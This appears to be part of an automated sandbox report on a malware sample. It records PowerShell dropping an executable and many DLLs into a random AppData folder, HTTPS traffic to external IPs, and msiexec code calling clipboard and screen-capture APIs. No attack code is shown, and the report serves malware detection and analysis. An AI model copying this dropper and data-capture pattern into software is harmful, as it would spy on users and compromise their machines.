Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000000.00000002.1929469102.0000021600225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000000.00000002.1929469102.0000021602115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216007B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600859000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216021B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216020A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600CAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021602210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216022AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160208A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600AFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160299B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.56.6:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 8_2_02F13A40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_02F13A40

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 8_2_02F13A40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_02F13A40

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 8_2_02F14A31 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

8_2_02F14A31

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvdisps.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\QtXml4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\QtNetwork4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\msvcp100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\QtGui4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\AdTree.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvptxJitCompiler32.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\QtCore4.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\StarBurn.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvdispsr.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x64\trading_api64.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\AbRoot.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\opengl64.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x64\tradingnetworkingsockets.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE8A50	8_2_02EE8A50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EF938B	8_2_02EF938B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EEDB6E	8_2_02EEDB6E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EEB330	8_2_02EEB330
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EEA0F0	8_2_02EEA0F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F190B0	8_2_02F190B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F0D896	8_2_02F0D896
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F07850	8_2_02F07850
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F1B9D0	8_2_02F1B9D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EEAE60	8_2_02EEAE60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F04E40	8_2_02F04E40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F18E00	8_2_02F18E00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F047A0	8_2_02F047A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EECF05	8_2_02EECF05
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F02C80	8_2_02F02C80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F01447	8_2_02F01447
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EEDDB7	8_2_02EEDDB7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F0D20D	8_2_02F0D20D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F1FAC0	8_2_02F1FAC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F092C5	8_2_02F092C5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE2AD0	8_2_02EE2AD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F1CAB0	8_2_02F1CAB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EFA28F	8_2_02EFA28F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F1C280	8_2_02F1C280
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F20272	8_2_02F20272
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F0E268	8_2_02F0E268
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F0524C	8_2_02F0524C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F0D214	8_2_02F0D214
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EFC3E8	8_2_02EFC3E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EFDBC3	8_2_02EFDBC3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F073C5	8_2_02F073C5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F17BCC	8_2_02F17BCC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F003B0	8_2_02F003B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EFBBAB	8_2_02EFBBAB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE9390	8_2_02EE9390
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE5B50	8_2_02EE5B50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F21320	8_2_02F21320
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F0A310	8_2_02F0A310
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F040E0	8_2_02F040E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F0A8C6	8_2_02F0A8C6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F088B6	8_2_02F088B6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EFA89A	8_2_02EFA89A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE5008	8_2_02EE5008
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F219C0	8_2_02F219C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F0C190	8_2_02F0C190
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F1F990	8_2_02F1F990
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE499E	8_2_02EE499E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F05972	8_2_02F05972
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE6160	8_2_02EE6160
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F0B960	8_2_02F0B960
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE8970	8_2_02EE8970
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F19920	8_2_02F19920
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE9930	8_2_02EE9930
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F07EF4	8_2_02F07EF4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F1BEC0	8_2_02F1BEC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F16EA4	8_2_02F16EA4
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EFF6B0	8_2_02EFF6B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F18690	8_2_02F18690
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EFE660	8_2_02EFE660
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F21660	8_2_02F21660
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F13650	8_2_02F13650
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F1764B	8_2_02F1764B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F01610	8_2_02F01610
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F073C5	8_2_02F073C5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE67F0	8_2_02EE67F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F097C0	8_2_02F097C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F03790	8_2_02F03790
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE7790	8_2_02EE7790
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE2720	8_2_02EE2720
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F19F12	8_2_02F19F12
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F06CF0	8_2_02F06CF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE34D0	8_2_02EE34D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EE6C80	8_2_02EE6C80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EFB49B	8_2_02EFB49B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F08C8C	8_2_02F08C8C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F10C79	8_2_02F10C79
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EFBC7C	8_2_02EFBC7C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EFC457	8_2_02EFC457
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F18430	8_2_02F18430
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F1FC20	8_2_02F1FC20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F20420	8_2_02F20420
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F11414	8_2_02F11414
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F1FDF0	8_2_02F1FDF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02EFFD80	8_2_02EFFD80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F0FD78	8_2_02F0FD78
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F21D60	8_2_02F21D60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F07D30	8_2_02F07D30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F09D13	8_2_02F09D13
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_02F1FD00	8_2_02F1FD00
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB443A6	9_2_6BB443A6
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB8A3DD	9_2_6BB8A3DD
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB4A2A7	9_2_6BB4A2A7
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB43A1C	9_2_6BB43A1C
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB47270	9_2_6BB47270
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BBD7A5A	9_2_6BBD7A5A
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB321F0	9_2_6BB321F0
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB5911E	9_2_6BB5911E
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB60919	9_2_6BB60919
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB47093	9_2_6BB47093
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB497A0	9_2_6BB497A0
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB48F83	9_2_6BB48F83
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB4867F	9_2_6BB4867F
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB43DD0	9_2_6BB43DD0
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB5457E	9_2_6BB5457E
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB49D65	9_2_6BB49D65

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\QHUPRmIp\AbRoot.dll 9FBEAB4BCFCEC34DC13CAD90609101B2EA099069AB173555635F174597E4EA09
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\QHUPRmIp\AdTree.dll 9FBEAB4BCFCEC34DC13CAD90609101B2EA099069AB173555635F174597E4EA09

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: String function: 6BB40C80 appears 45 times
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: String function: 6BB4B046 appears 36 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 02EF8E80 appears 68 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 02EE8270 appears 36 times

